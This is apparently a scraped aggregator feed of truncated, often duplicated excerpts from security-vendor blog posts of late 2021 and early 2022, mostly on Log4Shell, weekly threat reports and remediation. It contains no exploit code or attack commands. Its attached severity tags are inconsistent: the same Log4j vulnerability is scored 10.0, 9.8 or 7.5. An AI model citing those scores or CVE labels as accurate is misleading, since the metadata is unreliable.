Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
7th March – Threat Intelligence Report
blogs_checkpoint·2022-03-07
CVE-2021-25444 7th March – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 7th March – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 7th March, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research reports on cyber criminals’ and hacktivists’ increased activity leveraging Telegram amid the Russia-Ukraine war. Anti-Russian cyber-attack groups have been growing, while others claiming to fundraise for Ukraine are suspected to be fraudulent.
Ukraine “IT army” consisting of cyber-operatives and volunteers
Trendmicro
This Week in Security News - February 25, 2022
blogs_trendmicro·2022-02-25·CVSS 10.0
[CRITICAL] This Week in Security News - February 25, 2022
Cyber Crime
# This Week in Security News - February 25, 2022
Recent cyberattacks increasingly target open-source web servers, and US officials tell businesses to watch for potential ransomware attacks after Biden announces Russia sanctions
By: Jon Clay
2022/02/25
Read time: ( words)
Save to Folio
Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, learn about how to protect your organization from cyberattacks targeting open-source servers. Also, read about the most recent cyberattack warnings following Biden’s sanctions on Russia.
Read on:
Recent Cyberattacks Increasingly Target Open-source Web Servers
As organizations reeled from the Log4Shell vulnerability (CVE-2021-44228), cyber
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Trendmicro
Recent Cyberattacks Increasingly Target Open-source Web Servers
blogs_trendmicro·2022-02-22·CVSS 10.0
CVE-2021-44228 [CRITICAL] Recent Cyberattacks Increasingly Target Open-source Web Servers
APT & Targeted Attacks
## Recent Cyberattacks Target Open-source Web Servers
Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution, access control bypass, denial of service, or even cyberjacking the victim servers to mine cryptocurrencies.
By: Jon Clay 2022/02/22 Read time: ( words)
Save to Folio
As organizations reeled from the Log4Shell vulnerability ( CVE-2021-44228 ), cyberattacks aiming at open-source web servers, like Apache HTTP Server, were rapidly rising. Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution (RCE), access control bypass, denial of service (DoS), or even cyberjacking the victim servers to mine cryptocurrencies.
To protect enterprises against
Trendmicro
Recent Cyberattacks Increasingly Target Open-source Web Servers
blogs_trendmicro·2022-02-22·CVSS 9.8
CVE-2021-44228 [CRITICAL] Recent Cyberattacks Increasingly Target Open-source Web Servers
APT & Targeted Attacks
# Recent Cyberattacks Target Open-source Web Servers
Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution, access control bypass, denial of service, or even cyberjacking the victim servers to mine cryptocurrencies.
By: Jon Clay
2022/02/22
Read time: ( words)
Save to Folio
As organizations reeled from the Log4Shell vulnerability (CVE-2021-44228), cyberattacks aiming at open-source web servers, like Apache HTTP Server, were rapidly rising. Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution (RCE), access control bypass, denial of service (DoS), or even cyberjacking the victim servers to mine cryptocurrencies.
To protect enterprises against m
Trendmicro
Recent Cyberattacks Increasingly Target Open-source Web Servers
blogs_trendmicro·2022-02-22·CVSS 10.0
CVE-2021-44228 [CRITICAL] Recent Cyberattacks Increasingly Target Open-source Web Servers
APT & Targeted Attacks
## Recent Cyberattacks Target Open-source Web Servers
Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution, access control bypass, denial of service, or even cyberjacking the victim servers to mine cryptocurrencies.
By: Jon Clay Feb 22, 2022 Read time: ( words)
Save to Folio
As organizations reeled from the Log4Shell vulnerability ( CVE-2021-44228 ), cyberattacks aiming at open-source web servers, like Apache HTTP Server, were rapidly rising. Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution (RCE), access control bypass, denial of service (DoS), or even cyberjacking the victim servers to mine cryptocurrencies.
To protect enterprises again
Trendmicro
Recent Cyberattacks Increasingly Target Open-source Web Servers
blogs_trendmicro·2022-02-22·CVSS 10.0
CVE-2021-44228 [CRITICAL] Recent Cyberattacks Increasingly Target Open-source Web Servers
APT & attacchi mirati
## Recent Cyberattacks Target Open-source Web Servers
Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution, access control bypass, denial of service, or even cyberjacking the victim servers to mine cryptocurrencies.
By: Jon Clay Feb 22, 2022 Read time: ( words)
Save to Folio
As organizations reeled from the Log4Shell vulnerability ( CVE-2021-44228 ), cyberattacks aiming at open-source web servers, like Apache HTTP Server, were rapidly rising. Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution (RCE), access control bypass, denial of service (DoS), or even cyberjacking the victim servers to mine cryptocurrencies.
To protect enterprises agains
Trendmicro
Recent Cyberattacks Increasingly Target Open-source Web Servers
blogs_trendmicro·2022-02-22·CVSS 10.0
CVE-2021-44228 [CRITICAL] Recent Cyberattacks Increasingly Target Open-source Web Servers
APT y ataques dirigidos
## Recent Cyberattacks Target Open-source Web Servers
Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution, access control bypass, denial of service, or even cyberjacking the victim servers to mine cryptocurrencies.
By: Jon Clay Feb 22, 2022 Read time: ( words)
Save to Folio
As organizations reeled from the Log4Shell vulnerability ( CVE-2021-44228 ), cyberattacks aiming at open-source web servers, like Apache HTTP Server, were rapidly rising. Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution (RCE), access control bypass, denial of service (DoS), or even cyberjacking the victim servers to mine cryptocurrencies.
To protect enterprises agai
Checkpoint
21st February– Threat Intelligence Report
blogs_checkpoint·2022-02-21·CVSS 9.8
CVE-2018-13379 [CRITICAL] 21st February– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 21st February– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 21st February, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research has investigated the attack against Iranian broadcasting that occurred in late January. CPR was able to discover part of the tools that were utilized in this operation, including the evidence of the usage of a destructive wiper malware.
Check Point Research has discovered a new implementation of the
Checkpoint
31st January– Threat Intelligence Report
blogs_checkpoint·2022-01-31
CVE-2021-20038 31st January– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 31st January– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 31st January, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Hacktivist group from Belarus called “Belarusian Cyber Partisans” has breached the computers systems of Belarusian Railways. Threat actors claim to have encrypted the network and are extorting the Belarusian government, asking for the release of 50 political prisoners and a pledge from Belarussian Railways to halt transpor
Trendmicro
How to Detect Apache Log4j Vulnerabilities
blogs_trendmicro·2022-01-27·CVSS 10.0
[CRITICAL] How to Detect Apache Log4j Vulnerabilities
Network
## How to detect Apache Log4j vulnerabilities
Explore how to detect Apache Log4j (Log4Shell) vulnerabilities using cloud-native security tools.
By: Nitesh Surana Jan 27, 2022 Read time: ( words)
Save to Folio
In my previous blog, I reviewed how to detect Apache HTTP server exploitation from vulnerabilities in October. Weirdly enough, I wrote that article before the Apache Log4j (Log4Shell) news broke in December 2021 . So I’m back to write about how to detect the infamous Log4j vulnerability ( CVE-2021-44228 ) that allows attackers to achieve remote code execution on the victim servers using the vulnerable versions of the popular library in exposed web applications/services.
Source: Trend Micro
The above depicts a vulnerable public facing web service that logs the User-Agent
Trendmicro
How to Detect Apache Log4j Vulnerabilities
blogs_trendmicro·2022-01-27·CVSS 10.0
[CRITICAL] How to Detect Apache Log4j Vulnerabilities
Network
# How to detect Apache Log4j vulnerabilities
Explore how to detect Apache Log4j (Log4Shell) vulnerabilities using cloud-native security tools.
By: Nitesh Surana
2022/01/27
Read time: ( words)
Save to Folio
In my previous blog, I reviewed how to detect Apache HTTP server exploitation from vulnerabilities in October. Weirdly enough, I wrote that article before the Apache Log4j (Log4Shell) news broke in December 2021. So I’m back to write about how to detect the infamous Log4j vulnerability (CVE-2021-44228) that allows attackers to achieve remote code execution on the victim servers using the vulnerable versions of the popular library in exposed web applications/services.
Stages of Log4j attack
Before diving straight into detection/prevention, let’s first take a look at the di
Trendmicro
How to Detect Apache Log4j Vulnerabilities
blogs_trendmicro·2022-01-27·CVSS 10.0
[CRITICAL] How to Detect Apache Log4j Vulnerabilities
Network
## How to detect Apache Log4j vulnerabilities
Explore how to detect Apache Log4j (Log4Shell) vulnerabilities using cloud-native security tools.
By: Nitesh Surana 2022/01/27 Read time: ( words)
Save to Folio
In my previous blog, I reviewed how to detect Apache HTTP server exploitation from vulnerabilities in October. Weirdly enough, I wrote that article before the Apache Log4j (Log4Shell) news broke in December 2021 . So I’m back to write about how to detect the infamous Log4j vulnerability ( CVE-2021-44228 ) that allows attackers to achieve remote code execution on the victim servers using the vulnerable versions of the popular library in exposed web applications/services.
Source: Trend Micro
The above depicts a vulnerable public facing web service that logs the User-Agent f
Trendmicro
How to Detect Apache Log4j Vulnerabilities
blogs_trendmicro·2022-01-27·CVSS 10.0
[CRITICAL] How to Detect Apache Log4j Vulnerabilities
Red
## How to detect Apache Log4j vulnerabilities
Explore how to detect Apache Log4j (Log4Shell) vulnerabilities using cloud-native security tools.
By: Nitesh Surana Jan 27, 2022 Read time: ( words)
Save to Folio
In my previous blog, I reviewed how to detect Apache HTTP server exploitation from vulnerabilities in October. Weirdly enough, I wrote that article before the Apache Log4j (Log4Shell) news broke in December 2021 . So I’m back to write about how to detect the infamous Log4j vulnerability ( CVE-2021-44228 ) that allows attackers to achieve remote code execution on the victim servers using the vulnerable versions of the popular library in exposed web applications/services.
Source: Trend Micro
The above depicts a vulnerable public facing web service that logs the User-Agent fie
Tenable
Oracle January 2022 Critical Patch Update Addresses 266 CVEs
blogs_tenable·2022-01-19
Oracle January 2022 Critical Patch Update Addresses 266 CVEs
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Wiz
The top cloud security threats to be aware of in 2022 | Wiz Blog
blogs_wiz·2022-01-18·CVSS 10.0
[CRITICAL] The top cloud security threats to be aware of in 2022 | Wiz Blog
As more organizations move to the cloud, so do attackers. What can you do to better protect your cloud environment in 2022? Wiz Research has compiled the most pressing cloud security threats and how you can protect against them.
## Get the full report
Cloud adoption is growing so quickly that sometimes the technology is applied without the necessary security considerations or cloud knowledge. The cloud has new additional complexities that were not seen in standard on-premises environment: it is comprised of both CSPs and customer code, there is a complicated permissions model, it can be owned by different teams (DevOps, engineering, cloud security, and more) in the organization, and not all cloud assets can be easily monitored.
Challenges like these have opened cloud environments up to
Wiz
The top cloud security threats to be aware of in 2022 | Wiz Blog
blogs_wiz·2022-01-18·CVSS 10.0
[CRITICAL] The top cloud security threats to be aware of in 2022 | Wiz Blog
As more organizations move to the cloud, so do attackers. What can you do to better protect your cloud environment in 2022? Wiz Research has compiled the most pressing cloud security threats and how you can protect against them.
### Get the full report
Cloud adoption is growing so quickly that sometimes the technology is applied without the necessary security considerations or cloud knowledge. The cloud has new additional complexities that were not seen in standard on-premises environment: it is comprised of both CSPs and customer code, there is a complicated permissions model, it can be owned by different teams (DevOps, engineering, cloud security, and more) in the organization, and not all cloud assets can be easily monitored.
Challenges like these have opened cloud environments up to
Checkpoint
17th January– Threat Intelligence Report
blogs_checkpoint·2022-01-17
CVE-2022-22588 17th January– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 17th January– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 17th January, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Russia’s Federal Security Service (FSB) has arrested several members of the REvil ransomware group, responsible for the JBS attack and the Kaseya supply chain attack, among others, after carrying out raids at 25 addresses across Russia. It is currently unknown whether leaders of the group have been detained.
Check Point H
Huntress
VMware Horizon Servers Actively Being Hit With Cobalt Strike | Huntress
blogs_huntress·2022-01-15
VMware Horizon Servers Actively Being Hit With Cobalt Strike | Huntress
On January 5, the UK’s National Health Service (NHS) alerted that hackers were actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells. These web shells allow unauthenticated attackers to remotely execute commands on your server as NT AUTHORITY\SYSTEM (root privileges). According to Shodan, ~25,000 Horizon servers are currently internet accessible worldwide.
Our team is continuing to track this activity and this post will be updated with new information as it becomes available.
Image Source: NHS - https://digital.nhs.uk/cyber-alerts/2022/cc-4002
Based on Huntress’ dataset of 180 Horizon servers, we’ve validated NHS’ intel and discovered 10% of these systems (18) had been backdoored with a modified absg-worker.js w
Qualys
How to Make Log4Shell Remediation Quick & Effective
blogs_qualys·2022-01-11
How to Make Log4Shell Remediation Quick & Effective
## Table of Contents
Remediation Options
Upgrade Log4J or Remove the JndiLookup Class
Qualys Open-Source Remediation Utility
How to Remediate Log4Shell Using the Qualys Open Source Remediation Utility
For more information on Qualys Patch Management, please visit:
Confronting the Log4Shell vulnerability in your environment has seemed anything but “easy” due to its prevalence in Java applications. Rapid remediation is critical. In this blog, Qualys offers some advice – and a new utility – to speed up the process.
Remediation is a critical step to ensure that attackers do not exploit the Log4Shell vulnerable assets in your environment. As most organizations have multiple Java-based applications in their environment. and most Java-based applications use Log4J, the scope of this problem
Checkpoint
APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit
blogs_checkpoint·2022-01-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit
## Introduction
With the emergence of the Log4j security vulnerability, we’ve already seen multiple threat
Qualys
How to Make Log4Shell Remediation Quick & Effective | Qualys
blogs_qualys·2022-01-11
How to Make Log4Shell Remediation Quick & Effective | Qualys
#### Table of Contents
- Remediation Options
- Upgrade Log4J or Remove the JndiLookup Class
- Qualys Open-Source Remediation Utility
- How to Remediate Log4Shell Using the Qualys Open Source Remediation Utility
- For more information on Qualys Patch Management, please visit:
Confronting the Log4Shell vulnerability in your environment has seemed anything but “easy” due to its prevalence in Java applications. Rapid remediation is critical. In this blog, Qualys offers some advice – and a new utility – to speed up the process.
Remediation is a critical step to ensure that attackers do not exploit the Log4Shell vulnerable assets in your environment. As most organizations have multiple Java-based applications in their environment. and most Java-based applications use Log4J, the scope of this
Checkpoint
10th January– Threat Intelligence Report
blogs_checkpoint·2022-01-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] 10th January– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 10th January– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 10th January, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
A series of attacks targeting Russia’s Ministry of Foreign Affairs has been attributed to North Korean APT group Konni. Threat actors gained access by leveraging a socially engineered phishing campaign with New Year greetings and stealing credentials, aiming at collecting intelligence.
Check Point Anti-Bot provides protec
Sentinelone
Log4j One Month On | Crimeware and Exploitation Roundup
blogs_sentinelone·2022-01-10·CVSS 7.5
CVE-2021-44228 [HIGH] Log4j One Month On | Crimeware and Exploitation Roundup
It has been 31 days since the initial public disclosure of a critical remote code execution (RCE) vulnerability in the Apache Log4j logging library that upended enterprise security at the close of 2021. In that time, since the initial CVE-2021-44228 (critical), we’ve already seen five more related CVEs
CVE-2021-45046 (critical)
CVE-2021-4104 (high)
CVE-2021-42550 (moderate)
CVE-2021-45105 (moderate)
CVE-2021-44832 (moderate))
and several updates to the library from 2.15.01 on December 9th to 2.17.1 on December 28th.
The importance of this class of vulnerabilities in such a ubiquitous library must not be forgotten with the next spin of the cyber news cycle: with millions of vulnerable devices, attacks are likely to continue for as long as such devices running unpatched software can b
Sentinelone
Log4j One Month On | Crimeware and Exploitation Roundup
blogs_sentinelone·2022-01-10·CVSS 7.5
CVE-2021-44228 [HIGH] Log4j One Month On | Crimeware and Exploitation Roundup
It has been 31 days since the initial public disclosure of a critical remote code execution (RCE) vulnerability in the Apache Log4j logging library that upended enterprise security at the close of 2021. In that time, since the initial CVE-2021-44228 (critical), we’ve already seen five more related CVEs
- CVE-2021-45046 (critical)
- CVE-2021-4104 (high)
- CVE-2021-42550 (moderate)
- CVE-2021-45105 (moderate)
- CVE-2021-44832 (moderate))
and several updates to the library from 2.15.01 on December 9th to 2.17.1 on December 28th.
The importance of this class of vulnerabilities in such a ubiquitous library must not be forgotten with the next spin of the cyber news cycle: with millions of vulnerable devices, attacks are likely to continue for as long as such devices running unpatched software
Trendmicro
This Week in Security News - January 7, 2022
blogs_trendmicro·2022-01-07·CVSS 10.0
[CRITICAL] This Week in Security News - January 7, 2022
Exploits & Vulnerabilities
# This Week in Security News - January 7, 2022
This week, read about Log4j vulnerabilities in connected cars and charging stations and how iOS malware can fake iPhone shutdowns to snoop on cameras and microphones.
By: Jon Clay
Jan 07, 2022
Read time: ( words)
Save to Folio
Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, read about how Log4j vulnerabilities affect devices or properties embedded in or used for connected cars. Also, learn about an iOS malware that can fake iPhone shutdowns to snoop on a phone‘s camera and microphone.
Read on:
Are Endpoints at Risk for Log4Shell Attacks
The end of 2021 saw the emergence of the Log4Shell (CVE-2021-44228) v
Trendmicro
This Week in Security News - January 7, 2022
blogs_trendmicro·2022-01-07·CVSS 10.0
[CRITICAL] This Week in Security News - January 7, 2022
Exploits & Vulnerabilities
# This Week in Security News - January 7, 2022
This week, read about Log4j vulnerabilities in connected cars and charging stations and how iOS malware can fake iPhone shutdowns to snoop on cameras and microphones.
By: Jon Clay
2022/01/07
Read time: ( words)
Save to Folio
Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, read about how Log4j vulnerabilities affect devices or properties embedded in or used for connected cars. Also, learn about an iOS malware that can fake iPhone shutdowns to snoop on a phone‘s camera and microphone.
Read on:
Are Endpoints at Risk for Log4Shell Attacks
The end of 2021 saw the emergence of the Log4Shell (CVE-2021-44228) vul
Talos
Threat Source Newsletter (Jan. 6, 2022)
blogs_talos·2022-01-06·CVSS 8.8
[HIGH] Threat Source Newsletter (Jan. 6, 2022)
## Threat Source Newsletter (Jan. 6, 2022)
Good afternoon, Talos readers.
We hope everyone had some well-deserved, relaxing time off over the holidays. Unfortunately, we are all back now and Log4j is still an issue .
And even though it seems like Log4j has already been in the news for a year, it's actually only been a few weeks. There were several other stories worth taking a look back in 2021, from the fallout of SolarWinds to the Kaseya supply chain attack. Take a look back with us to see what we can learn from the past year with our Year in Review .
We also released a new video walkthrough, which you can watch above, that covers how to safely and securely set up a new IoT assistant. Many of you may have received a new Google Home or Alexa smart device. And while these devices certai
Talos
Threat Source Newsletter (Jan. 6, 2022)
blogs_talos·2022-01-06·CVSS 8.8
[HIGH] Threat Source Newsletter (Jan. 6, 2022)
Good afternoon, Talos readers.
We hope everyone had some well-deserved, relaxing time off over the holidays. Unfortunately, we are all back now and Log4j is still an issue.
And even though it seems like Log4j has already been in the news for a year, it's actually only been a few weeks. There were several other stories worth taking a look back in 2021, from the fallout of SolarWinds to the Kaseya supply chain attack. Take a look back with us to see what we can learn from the past year with our Year in Review.
We also released a new video walkthrough, which you can watch above, that covers how to safely and securely set up a new IoT assistant. Many of you may have received a new Google Home or Alexa smart device. And while these devices certainly come with inherent cybersecurity risks, th
Wiz
Towards a better cloud vulnerability response model | Wiz Blog
blogs_wiz·2022-01-05
Towards a better cloud vulnerability response model | Wiz Blog
Over the past year, the Wiz research team disclosed several critical cloud vulnerabilities such as the AWS IAM cross-account vulnerabilities, ChaosDB, and OMIGOD. In each, there was a startling level of uncertainty around who was responsible for what between security teams and the Cloud Service Providers (CSPs). This lack of certainty hampered customers’ remediation efforts and sowed confusion between them and CSPs. It struck me that while the shared responsibility model in cloud infrastructure was (over-) discussed, the same cannot be said for the vulnerability disclosure and response model in the cloud.
In this post, I lay out why we need a shared response model for cloud vulnerabilities, review the current state, and describe what a more transparent and scalable model could look like.
Wiz
Towards a better cloud vulnerability response model | Wiz Blog
blogs_wiz·2022-01-05
Towards a better cloud vulnerability response model | Wiz Blog
Over the past year, the Wiz research team disclosed several critical cloud vulnerabilities such as the AWS IAM cross-account vulnerabilities , ChaosDB , and OMIGOD . In each, there was a startling level of uncertainty around who was responsible for what between security teams and the Cloud Service Providers (CSPs). This lack of certainty hampered customers’ remediation efforts and sowed confusion between them and CSPs. It struck me that while the shared responsibility model in cloud infrastructure was (over-) discussed, the same cannot be said for the vulnerability disclosure and response model in the cloud.
In this post, I lay out why we need a shared response model for cloud vulnerabilities, review the current state, and describe what a more transparent and scalable model could look lik
Checkpoint
3rd January– Threat Intelligence Report
blogs_checkpoint·2022-01-03·CVSS 10.0
CVE-2021-44228 [CRITICAL] 3rd January– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 3rd January– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 3rd January, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
The Vietnamese trading platform ONUS was victim of a ransomware attack leveraging the Log4j flaw on its payment system. Cyber criminals demanded a $5 million ransom in a double extortion scheme. ONUS refused to pay, so threat actors published for sale records of 2 million ONUS costumers.
Check Point IPS provides protection
Qualys
Log4Shell – Follow This Multi-Layered Approach for Detection and Remediation
blogs_qualys·2021-12-28·CVSS 10.0
[CRITICAL] Log4Shell – Follow This Multi-Layered Approach for Detection and Remediation
## Table of Contents
Log4Shell 5 Key Things You Need to Know
What Attackers Know and What They Are Doing
So What Can You Do
Since the Log4Shell vulnerability was first discovered, Qualys has analyzed and responded to the threat in a systematic way approaching it from all angles – detection, mitigation and remediation. Recognizing the challenge it poses to large enterprises, we recommend that organizations follow a prioritized, layered approach in addressing this vulnerability.
Since the Log4Shell vulnerability was first discovered, the Qualys Research Team has analyzed the threat and updated Qualys Cloud Platform to help customers respond quickly.
We recognize that for many organizations the scope of the challenge is large, as it involves all Java-based applications in their environm
Qualys
Log4Shell – Follow This Multi-Layered Approach for Detection and Remediation | Qualys
blogs_qualys·2021-12-28·CVSS 10.0
[CRITICAL] Log4Shell – Follow This Multi-Layered Approach for Detection and Remediation | Qualys
#### Table of Contents
- Log4Shell 5 Key Things You Need to Know
- What Attackers Know and What They Are Doing
- So What Can You Do
Since the Log4Shell vulnerability was first discovered, Qualys has analyzed and responded to the threat in a systematic way approaching it from all angles – detection, mitigation and remediation. Recognizing the challenge it poses to large enterprises, we recommend that organizations follow a prioritized, layered approach in addressing this vulnerability.
Since the Log4Shell vulnerability was first discovered, the Qualys Research Team has analyzed the threat and updated Qualys Cloud Platform to help customers respond quickly.
We recognize that for many organizations the scope of the challenge is large, as it involves all Java-based applications in their en
Qualys
How to Discover Log4Shell Vulnerabilities in Running Containers & Images
blogs_qualys·2021-12-27·CVSS 10.0
CVE-2021-44228 [CRITICAL] How to Discover Log4Shell Vulnerabilities in Running Containers & Images
If you run Java applications in containers, then it is critical that you check for Log4Shell vulnerabilities, given the high severity of this potential exploit. Qualys Container Security offers multiple methods to help you detect Log4Shell in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities:
QID 376157/ CVE-2021-44228 – Detect venerable log4 jar for versions at or below 2.14
QID 376178/ CVE-2021-45046 – Detect venerable log4 jar for versions at or below 2.15
QID 376194/ CVE-2021-45105 – Detect venerable log4 jar for versions at or below 2.16
Qualys highly recommends running a vulnerability scan against all your running containers because Java applications running the container are susceptible
Qualys
How to Discover Log4Shell Vulnerabilities in Running Containers & Images | Qualys
blogs_qualys·2021-12-27·CVSS 10.0
CVE-2021-44228 [CRITICAL] How to Discover Log4Shell Vulnerabilities in Running Containers & Images | Qualys
If you run Java applications in containers, then it is critical that you check for Log4Shell vulnerabilities, given the high severity of this potential exploit. Qualys Container Security offers multiple methods to help you detect Log4Shell in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities:
- QID 376157/CVE-2021-44228 – Detect venerable log4 jar for versions at or below 2.14
- QID 376178/CVE-2021-45046 – Detect venerable log4 jar for versions at or below 2.15
- QID 376194/CVE-2021-45105 – Detect venerable log4 jar for versions at or below 2.16
Qualys highly recommends running a vulnerability scan against all your running containers because Java applications running the container are susceptibl
Checkpoint
27th December – Threat Intelligence Report
blogs_checkpoint·2021-12-26·CVSS 10.0
CVE-2021-44228 [CRITICAL] 27th December – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 27th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 27th December, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Researchers have revealed an APT-like campaign targeting the US Federal Government Commission on international rights and religious freedom. Threat actors used a backdoor that possibly gave them full visibility and control over the compromised network for further exploitation.
New phishing campaign is luring victims in
Trendmicro
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
blogs_trendmicro·2021-12-23
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
Exploits & Vulnerabilities
## Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
In this entry we look into how Log4j vulnerabilities affect devices or properties embedded in or used for connected cars, specifically chargers, in-vehicle infotainment systems, and digital remotes for opening cars.
By: Sébastien Dudek 2021/12/23 Read time: ( words)
Save to Folio
Since its disclosure on Dec. 9, a vast number of articles have been written on the remote code execution (RCE) vulnerability in the library Apache Log4j — a reflection of its impact. The library is used by innumerable programs to easily release log statements without modifying the code. This means that it has an expansive attack surface, with Amazon, Apple, Cloudflare, Google, Tencent, Twitter, and many other
Trendmicro
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
blogs_trendmicro·2021-12-23
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
Sfruttamento vulnerabilità
## Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
In this entry we look into how Log4j vulnerabilities affect devices or properties embedded in or used for connected cars, specifically chargers, in-vehicle infotainment systems, and digital remotes for opening cars.
By: Sébastien Dudek Dec 23, 2021 Read time: ( words)
Save to Folio
Since its disclosure on Dec. 9, a vast number of articles have been written on the remote code execution (RCE) vulnerability in the library Apache Log4j — a reflection of its impact. The library is used by innumerable programs to easily release log statements without modifying the code. This means that it has an expansive attack surface, with Amazon, Apple, Cloudflare, Google, Tencent, Twitter, and many oth
Trendmicro
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
blogs_trendmicro·2021-12-23
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
Exploits y vulnerabilidades
## Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
In this entry we look into how Log4j vulnerabilities affect devices or properties embedded in or used for connected cars, specifically chargers, in-vehicle infotainment systems, and digital remotes for opening cars.
